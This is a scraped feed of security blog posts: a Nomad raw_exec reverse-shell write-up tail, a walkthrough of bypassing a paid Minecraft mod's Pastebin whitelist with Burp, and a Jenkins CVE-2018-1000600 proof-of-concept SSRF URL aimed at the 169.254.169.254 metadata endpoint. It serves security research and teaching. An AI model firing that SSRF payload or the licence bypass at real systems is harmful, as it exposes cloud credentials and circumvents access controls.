src=\"https:\/\/4.bp.blogspot.com\/-8untVMp3n8Y\/XBkicE5U8dI\/AAAAAAAACXA\/oByKCRwUJyA2__KgMCGcGPgdQql-y23fgCLcBGAs\/s640\/Screen%2BShot%2B2018-12-18%2Bat%2B11.37.24%2BAM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv style=\"text-align: center;\"\u003E\nReverse shell job\u003C\/div\u003E\n\u003Cdiv style=\"text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/3.bp.blogspot.com\/-R2_fS_qs_Ug\/XBkibzV5ckI\/AAAAAAAACW8\/AHtrutO0SAMMhMdNDHRc6rc-4SpWmIhvwCEwYBhgL\/s1600\/Screen%2BShot%2B2018-12-18%2Bat%2B11.37.11%2BAM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"541\" data-original-width=\"1600\" height=\"216\" src=\"https:\/\/3.bp.blogspot.com\/-R2_fS_qs_Ug\/XBkibzV5ckI\/AAAAAAAACW8\/AHtrutO0SAMMhMdNDHRc6rc-4SpWmIhvwCEwYBhgL\/s640\/Screen%2BShot%2B2018-12-18%2Bat%2B11.37.11%2BAM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nShell from nomad\u003C\/div\u003E\n\u003Cdiv style=\"text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv style=\"text-align: left;\"\u003E\n-CG\u003C\/div\u003E\n\u003Cbr \/\u003E\nInfo on locking nomad down via ACLs:\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/www.nomadproject.io\/guides\/security\/acl.html\" target=\"_blank\"\u003Ehttps:\/\/www.nomadproject.io\/guides\/security\/acl.html\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/1555777666843031796\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=1555777666843031796","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/1555777666843031796"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/1555777666843031796"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/12\/devoops-nomad-with-rawexec-enabled.html","title":"Devoops: Nomad with raw_exec enabled"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/2.bp.blogspot.com\/-lPPcT1H9GQo\/XBkZSP2G-JI\/AAAAAAAACVU\/UPTYb2jaIlMtW97fBU69pKAziQvHcHOsQCLcBGAs\/s72-c\/Screen%2BShot%2B2018-12-18%2Bat%2B10.57.58%2BAM.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-2935063491704924266"},"published":{"$t":"2019-05-14T15:17:00.000-04:00"},"updated":{"$t":"2019-05-14T15:17:58.378-04:00"},"title":{"type":"text","$t":"Minecraft Mod, Follow up, and Java Reflection"},"content":{"type":"html","$t":"After \u003Ca href=\"https:\/\/carnal0wnage.attackresearch.com\/2019\/05\/minecraft-mod-mothers-day-and-hacker-dad.html\"\u003Eyesterday's post\u003C\/a\u003E, I received a ton of interesting and creative responses regarding how to get around the mod's restrictions which is what I love about our community. \u003Ca href=\"https:\/\/twitter.com\/mubix\"\u003EMubix\u003C\/a\u003E was the first person to reach out and suggest hijacking calls to Pastebin using \/etc\/hosts (which I did try but was having some wonky behavior with OSX) and there were other suggestions as well with regards to hijacking DNS and pretending to be the site (Pastebin).\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nHowever, my FAVORITE suggestion came from a co-worker of mine (and all around super cool\/talented hacker)\u0026nbsp;\u003Ca href=\"https:\/\/twitter.com\/fletchto99\"\u003EMatt Langlois\u003C\/a\u003E. He had an idea for a better workaround. One that didn't require proxying web traffic or for you to even be connected to the internet. He decided to override the code that checks the list of allowed users and inject our UUID into that list. It works beautifully but rather than try to explain the details in this blog post, I \u003Ca href=\"https:\/\/blog.fletchto99.com\/2019\/may\/minecraft-mod-reversing\/\"\u003Esuggest you visit his blog post to check out the details\u003C\/a\u003E.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nThe gist is that Java reflection allows you to override methods in memory and this is exactly what Matt did. So - \u003Ca href=\"https:\/\/blog.fletchto99.com\/2019\/may\/minecraft-mod-reversing\/\"\u003Ego check out the blog post!\u003C\/a\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/2935063491704924266\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=2935063491704924266","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/2935063491704924266"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/2935063491704924266"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/05\/minecraft-mod-follow-up-and-java.html","title":"Minecraft Mod, Follow up, and Java Reflection"}],"author":[{"name":{"$t":"cktricky"},"uri":{"$t":"http:\/\/www.blogger.com\/profile\/16815248087217800849"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"24","height":"32","src":"\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjzbwSNk_s0HvOxfbAtSl2FhHna2aB6Xo7-_ZCNbVXymFAuMWTQm3pW0F7uI4NvrI9QfGqrYukEzyCuhpx3mtzQ-TRFv4WxM_N4kzLnphfpUKuw0emNZXEl_B7_tnXLjAo\/s220\/myphoto.gif"}}],"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-6390282015124107743"},"published":{"$t":"2019-05-13T11:59:00.000-04:00"},"updated":{"$t":"2019-05-13T11:59:39.209-04:00"},"title":{"type":"text","$t":"Minecraft Mod, Mother's Day, and A Hacker Dad"},"content":{"type":"html","$t":"Over the weekend my wife was feeling under the weather. This meant we were stuck indoors and since she is sick and it's Mother's day weekend - less than ideal situation - I needed to keep my son as occupied as possible so she could rest and recuperate.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nWhen I asked my son what he wanted to do, he responded with a new Minecraft mod he'd seen on one of these YouTuber's channels. The mod allows you be various Marvel superheroes! Except, the mod version we downloaded... well it lacked the suits he'd seen on YouTube (of course it did).\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nDid my homework, realized he wanted a version that was only released if you were a Patreon supporter. Now, I'm totally cool giving 5 bucks for software that somebody poured their heart into and with having recently watched Endgame... the desire for the Iron man stuff shown in this paid-for-mod was larger than the desire to hold on to my 5 dollars. Went on Patreon, donated the $5, and downloaded the mod. Fired it up, everything appeared fine... then I got this...\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ca href=\"http:\/\/4.bp.blogspot.com\/-wptsvIYyVLw\/XNisg8vKGoI\/AAAAAAAABGw\/2Srq6StWVGMkI9tMt8mh8XKPzrVfwhyMACK4BGAYYCw\/s1600\/Screen%2BShot%2B2019-05-12%2Bat%2B7.27.48%2BPM.png\" imageanchor=\"1\"\u003E\u003Cimg border=\"0\" height=\"369\" src=\"https:\/\/4.bp.blogspot.com\/-wptsvIYyVLw\/XNisg8vKGoI\/AAAAAAAABGw\/2Srq6StWVGMkI9tMt8mh8XKPzrVfwhyMACK4BGAYYCw\/s640\/Screen%2BShot%2B2019-05-12%2Bat%2B7.27.48%2BPM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nWhat? Seriously? Well, I go back in and re-read the Patreon message...\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ca href=\"http:\/\/3.bp.blogspot.com\/-EVHcBDqIwX4\/XNi0iI_wbCI\/AAAAAAAABG8\/PUuw-72Q0HoHXnwJxFwA1sZejGom6QpGwCK4BGAYYCw\/s1600\/Screen%2BShot%2B2019-05-12%2Bat%2B8.03.27%2BPM.png\" imageanchor=\"1\"\u003E\u003Cimg border=\"0\" height=\"377\" src=\"https:\/\/3.bp.blogspot.com\/-EVHcBDqIwX4\/XNi0iI_wbCI\/AAAAAAAABG8\/PUuw-72Q0HoHXnwJxFwA1sZejGom6QpGwCK4BGAYYCw\/s640\/Screen%2BShot%2B2019-05-12%2Bat%2B8.03.27%2BPM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nUgh, so a couple issues here. One, we wanted access now. Taking a day (maybe) to add us to some magical list is less than ideal (which, the creator still hasn't responded to my emails so perhaps... never?). Secondly, I'm wondering if this is some sort of \"donate $5 every month to continue being on the magical list to use this mod\". And, if I already paid for software, I just plain old don't like being at the mercy of someone else.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nTime to be the hacker dad hero my son needs :P (plus, I wanted to teach him a life lesson about the hacker spirit).\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nOkay so... a mod is just a jar file... let's open this up with JD-GUI and search for \"Unauthorized use\".\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ca href=\"http:\/\/3.bp.blogspot.com\/-SSIwULrzxII\/XNi2ONbg0bI\/AAAAAAAABHI\/j7XI_aXDQ8UnlotLEcWLSQosQBV37YT9QCK4BGAYYCw\/s1600\/Screen%2BShot%2B2019-05-12%2Bat%2B8.10.35%2BPM.png\" imageanchor=\"1\"\u003E\u003Cimg border=\"0\" height=\"368\" src=\"https:\/\/3.bp.blogspot.com\/-SSIwULrzxII\/XNi2ONbg0bI\/AAAAAAAABHI\/j7XI_aXDQ8UnlotLEcWLSQosQBV37YT9QCK4BGAYYCw\/s400\/Screen%2BShot%2B2019-05-12%2Bat%2B8.10.35%2BPM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nEach of these handlers has the same code, they all look basically identical, and they are checking to see if you're in a list and if you're not, then you don't get to play.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"http:\/\/3.bp.blogspot.com\/-J_pX--EQ9gc\/XNi3UiliatI\/AAAAAAAABHg\/fcQJvc6oYdQ2FLTNybBi6WLbsRyZEfC8gCK4BGAYYCw\/s1600\/Screen%2BShot%2B2019-05-12%2Bat%2B8.14.32%2BPM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" src=\"https:\/\/3.bp.blogspot.com\/-J_pX--EQ9gc\/XNi3UiliatI\/AAAAAAAABHg\/fcQJvc6oYdQ2FLTNybBi6WLbsRyZEfC8gCK4BGAYYCw\/s1600\/Screen%2BShot%2B2019-05-12%2Bat%2B8.14.32%2BPM.png\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\nSo where is this list coming from? Looks like \u003Cb\u003ESuperHeroesBetaTesterChecker.getList()\u003C\/b\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ca href=\"http:\/\/2.bp.blogspot.com\/-jDmZWNc-zE8\/XNi4D87kxoI\/AAAAAAAABH0\/uhTrX9UE3CozrYrQo8QUYS8TIcM7qDltACK4BGAYYCw\/s1600\/Screen%2BShot%2B2019-05-12%2Bat%2B8.18.32%2BPM.png\" imageanchor=\"1\"\u003E\u003Cimg border=\"0\" src=\"https:\/\/2.bp.blogspot.com\/-jDmZWNc-zE8\/XNi4D87kxoI\/AAAAAAAABH0\/uhTrX9UE3CozrYrQo8QUYS8TIcM7qDltACK4BGAYYCw\/s1600\/Screen%2BShot%2B2019-05-12%2Bat%2B8.18.32%2BPM.png\" \/\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ca href=\"http:\/\/1.bp.blogspot.com\/-8IZPT1JGKKw\/XNi4gvxU6kI\/AAAAAAAABIE\/6OGmiEDLrdcdqhxYLjq15ntbiTwngcWRgCK4BGAYYCw\/s1600\/Screen%2BShot%2B2019-05-12%2Bat%2B8.20.42%2BPM.png\" imageanchor=\"1\"\u003E\u003Cimg border=\"0\" src=\"https:\/\/1.bp.blogspot.com\/-8IZPT1JGKKw\/XNi4gvxU6kI\/AAAAAAAABIE\/6OGmiEDLrdcdqhxYLjq15ntbiTwngcWRgCK4BGAYYCw\/s1600\/Screen%2BShot%2B2019-05-12%2Bat%2B8.20.42%2BPM.png\" \/\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nWhat? Are we seriously pulling down some list from pastebin.com to find out who our authorized users are?\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ca href=\"http:\/\/1.bp.blogspot.com\/-DkY_HY81FZY\/XNi5fGUirgI\/AAAAAAAABIk\/zPM5ALwxPbobi04s3GyK4BUoHcJ5MxzzQCK4BGAYYCw\/s1600\/Screen%2BShot%2B2019-05-12%2Bat%2B8.23.12%2BPM.png\" imageanchor=\"1\"\u003E\u003Cimg border=\"0\" height=\"244\" src=\"https:\/\/1.bp.blogspot.com\/-DkY_HY81FZY\/XNi5fGUirgI\/AAAAAAAABIk\/zPM5ALwxPbobi04s3GyK4BUoHcJ5MxzzQCK4BGAYYCw\/s320\/Screen%2BShot%2B2019-05-12%2Bat%2B8.23.12%2BPM.png\" width=\"320\" \/\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ca href=\"http:\/\/3.bp.blogspot.com\/-5DzMSAJqKRU\/XNi4zdnvVII\/AAAAAAAABIQ\/LM5xPx77tRc8Po9vrPkAe4pyA8Jz3xAhgCK4BGAYYCw\/s1600\/giphy.gif\" imageanchor=\"1\"\u003E\u003Cimg border=\"0\" height=\"136\" src=\"https:\/\/3.bp.blogspot.com\/-5DzMSAJqKRU\/XNi4zdnvVII\/AAAAAAAABIQ\/LM5xPx77tRc8Po9vrPkAe4pyA8Jz3xAhgCK4BGAYYCw\/s320\/giphy.gif\" width=\"320\" \/\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nAlright.... so... UUIDs? As it turns out, UUIDs map to usernames and that information is totally retrievable and this handy site helps\u0026nbsp;\u003Ca href=\"https:\/\/mcuuid.net\/\"\u003Ehttps:\/\/mcuuid.net\/\u003C\/a\u003E.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ca href=\"http:\/\/2.bp.blogspot.com\/-e5_ZCNl2BlY\/XNi54QR26EI\/AAAAAAAABI0\/qlIu1v_Uh048wlqtQwkYVLto21sj1VozgCK4BGAYYCw\/s1600\/Screen%2BShot%2B2019-05-12%2Bat%2B8.27.00%2BPM.png\" imageanchor=\"1\"\u003E\u003Cimg border=\"0\" height=\"98\" src=\"https:\/\/2.bp.blogspot.com\/-e5_ZCNl2BlY\/XNi54QR26EI\/AAAAAAAABI0\/qlIu1v_Uh048wlqtQwkYVLto21sj1VozgCK4BGAYYCw\/s320\/Screen%2BShot%2B2019-05-12%2Bat%2B8.27.00%2BPM.png\" width=\"320\" \/\u003E\u003C\/a\u003E\u003Cbr \/\u003E\nCool so now I know our UUIDs (and you do too but, again, anyone can find that out so it's really whatever).\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nNow originally, I tried decompiling, changing the source and recompiling. At one point I even had my environment setup to compile from Eclipse with forge and this source code. But this was taking a couple hours and I needed a \u003Cb\u003E\u003Cu\u003Equick\u003C\/u\u003E\u003C\/b\u003E solution. This is where Burp came into play. Here is what I did.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n1. Set Burp to listen on all interfaces under the proxy options\u003Cbr \/\u003E\n2. Exported its certificate so that both my son and my machines trusted the proxy for https traffic (no cert warnings)\u003Cbr \/\u003E\n3. Set our machines to use the Burp proxy for all of our traffic for Secure Web Traffic\u003Cbr \/\u003E\n4. Added a few proxy match \u0026amp; replace rules that replaces one of the other UUIDs with ours (and usernames for dev level access because.. why not)\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ca href=\"http:\/\/4.bp.blogspot.com\/-DwDtyJ4wbKI\/XNmQsyfxe0I\/AAAAAAAABJE\/sSrc7EYSPEE5YwehY9VTMqTD_W33dbr2wCK4BGAYYCw\/s1600\/Screen%2BShot%2B2019-05-13%2Bat%2B11.41.50%2BAM.png\" imageanchor=\"1\"\u003E\u003Cimg border=\"0\" height=\"178\" src=\"https:\/\/4.bp.blogspot.com\/-DwDtyJ4wbKI\/XNmQsyfxe0I\/AAAAAAAABJE\/sSrc7EYSPEE5YwehY9VTMqTD_W33dbr2wCK4BGAYYCw\/s640\/Screen%2BShot%2B2019-05-13%2Bat%2B11.41.50%2BAM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nThat's basically it. Once our machines started routing traffic thru my Burp proxy, every response from pastebin.com with those UUIDs automatically had ours added to the list as authorized users and it worked like a charm.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ca href=\"http:\/\/4.bp.blogspot.com\/-2jkqZY81WgY\/XNmSQReH9nI\/AAAAAAAABJQ\/DzeZ7lSSEJYaFWrfkcj2iB9Tz7yTjG76QCK4BGAYYCw\/s1600\/Screen%2BShot%2B2019-05-13%2Bat%2B11.49.32%2BAM.png\" imageanchor=\"1\"\u003E\u003Cimg border=\"0\" height=\"374\" src=\"https:\/\/4.bp.blogspot.com\/-2jkqZY81WgY\/XNmSQReH9nI\/AAAAAAAABJQ\/DzeZ7lSSEJYaFWrfkcj2iB9Tz7yTjG76QCK4BGAYYCw\/s640\/Screen%2BShot%2B2019-05-13%2Bat%2B11.49.32%2BAM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nNote that I have not given detailed instructions on those above 4 steps because... there are already tons of tutorials out there if you're not already familiar with Burp \u0026amp; proxying web traffic.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nLet's summarize. We paid $5, and we got told we still needed special permission to use this mod. Didn't sit well, wanted to get this working, and figured I could teach my son a little bit about computers\/hacking. Now, did I email the creator of the mod? Yes, in fact I let them know what I found and the workaround. Was very upfront about that. Also provided usernames in case the creator did feel like adding them (though I doubt he's feeling super generous). But we had some fun, learned a little, and got to use the mod.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nHaving said all that, if you're in a position to donate even a few bucks for software that someone spends a good chunk of their time writing, I'd say do it. But if they don't deliver as promised... put on your hacker hat :-).\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cbr \/\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/6390282015124107743\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=6390282015124107743","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/6390282015124107743"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/6390282015124107743"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/05\/minecraft-mod-mothers-day-and-hacker-dad.html","title":"Minecraft Mod, Mother's Day, and A Hacker Dad"}],"author":[{"name":{"$t":"cktricky"},"uri":{"$t":"http:\/\/www.blogger.com\/profile\/16815248087217800849"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"24","height":"32","src":"\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjzbwSNk_s0HvOxfbAtSl2FhHna2aB6Xo7-_ZCNbVXymFAuMWTQm3pW0F7uI4NvrI9QfGqrYukEzyCuhpx3mtzQ-TRFv4WxM_N4kzLnphfpUKuw0emNZXEl_B7_tnXLjAo\/s220\/myphoto.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/4.bp.blogspot.com\/-wptsvIYyVLw\/XNisg8vKGoI\/AAAAAAAABGw\/2Srq6StWVGMkI9tMt8mh8XKPzrVfwhyMACK4BGAYYCw\/s72-c\/Screen%2BShot%2B2019-05-12%2Bat%2B7.27.48%2BPM.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-2715327188736957907"},"published":{"$t":"2019-03-05T14:01:00.003-05:00"},"updated":{"$t":"2019-03-05T14:01:41.948-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"jenkins"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Jenkins - CVE-2018-1000600 PoC"},"content":{"type":"html","$t":"\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003Esecond exploit from the blog post\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Ca href=\"https:\/\/blog.orange.tw\/2019\/01\/hacking-jenkins-part-1-play-with-dynamic-routing.html\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/blog.orange.tw\/2019\/01\/hacking-jenkins-part-1-play-with-dynamic-routing.html\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"background-color: white; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003EChained with CVE-2018-1000600 to a Pre-auth Fully-responded SSRF\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Ca href=\"https:\/\/jenkins.io\/security\/advisory\/2018-06-25\/#SECURITY-915\"\u003Ehttps:\/\/jenkins.io\/security\/advisory\/2018-06-25\/#SECURITY-915\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"background-color: white;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white;\"\u003EThis affects the GitHub\u0026nbsp;plugin that is installed by default. However, I learned that when you spin up a new jenkins instance it pulls all the updated plugins (also by default) I'm honestly not sure how often people set update to latest plugin on by default but it does seem to knock down some of this stuff.\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"background-color: white;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white;\"\u003Eexploit works against:\u0026nbsp;\u003C\/span\u003EGitHub Plugin up to and including 1.29.1\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EWhen i installed Jenkins today (25 Feb 19) it installed 1.29.4 by default thus the below does NOT work.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EFrom the blog post:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cblockquote class=\"tr_bq\"\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"background-color: #f8f8f8; font-family: \u0026quot;ubuntu\u0026quot;; font-size: 13.2px;\"\u003ECSRF vulnerability and missing permission checks in GitHub Plugin allowed capturing credentials\u003C\/span\u003E\u0026nbsp;\u003C\/span\u003E\u003C\/blockquote\u003E\n\u003Cblockquote class=\"tr_bq\"\u003E\n\u003Cspan style=\"background-color: white; color: #444444; font-family: \u0026quot;ubuntu\u0026quot;; font-size: 13.2px;\"\u003EIt can extract any stored credentials with known credentials ID in Jenkins. But the credentials ID is a random UUID if there is no user-supplied value provided. So it seems impossible to exploit this?(Or if someone know how to obtain credentials ID, please tell me!)\u003C\/span\u003E\u003C\/blockquote\u003E\n\u003Cblockquote class=\"tr_bq\"\u003E\n\u003Cspan style=\"background-color: white; color: #444444; font-family: \u0026quot;ubuntu\u0026quot;; font-size: 13.2px;\"\u003EAlthough it can’t extract any credentials without known credentials ID, there is still another attack primitive - a fully-response SSRF! We all know how hard it is to exploit a Blind SSRF, so that’s why a fully-responded SSRF is so valuable!\u003C\/span\u003E\u003C\/blockquote\u003E\n\u003Cdiv style=\"background-color: white; box-sizing: border-box; font-family: \u0026quot;ubuntu\u0026quot;; font-weight: 300; line-height: 1.1; margin: 1.2em 0px; position: relative;\"\u003E\n\u003Cspan style=\"color: #444444;\"\u003EPoC:\u003C\/span\u003E\u003C\/div\u003E\n\u003Cpre style=\"background-color: #f8f8f8; border-radius: 5px; border: 0px; box-sizing: border-box; font-family: \u0026quot;source code pro\u0026quot;, monospace; font-size: 0.9em; line-height: 1.45; margin-bottom: 1.1em; overflow-wrap: break-word; padding: 10px 20px; white-space: pre-wrap;\"\u003E\u003Ccode style=\"background-color: transparent; border-radius: 0px; box-sizing: border-box; font-family: \u0026quot;source code pro\u0026quot;, monospace; font-size: inherit; padding: 0px;\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttp:\/\/jenkins.local\/securityRealm\/user\/admin\/descriptorByName\/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator\/createTokenByPassword\n?apiUrl=http:\/\/169.254.169.254\/%23\n\u0026amp;login=orange\n\u0026amp;password=tsai\u003C\/span\u003E\u003C\/code\u003E\u003C\/pre\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"background-color: white; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Cspan style=\"background-color: white;\"\u003ETo get old versions of the plugin and info you can go to\u0026nbsp;\u003C\/span\u003E\u003C\/span\u003E\u0026nbsp;\u003Cspan style=\"background-color: white; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Ca href=\"https:\/\/wiki.jenkins.io\/display\/JENKINS\/GitHub+Branch+Source+Plugin\" target=\"_blank\"\u003Ehttps:\/\/wiki.jenkins.io\/display\/JENKINS\/GitHub+Branch+Source+Plugin\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"font-family: \u0026quot;ubuntu\u0026quot;;\"\u003Edownload old versions\u003C\/span\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Ca href=\"https:\/\/updates.jenkins.io\/download\/plugins\/github-branch-source\/\" target=\"_blank\"\u003Ehttps:\/\/updates.jenkins.io\/download\/plugins\/github-branch-source\/\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Ca href=\"https:\/\/updates.jenkins.io\/download\/plugins\/github\/\" target=\"_blank\"\u003Ehttps:\/\/updates.jenkins.io\/download\/plugins\/github\/\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/2715327188736957907\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=2715327188736957907","title":"0 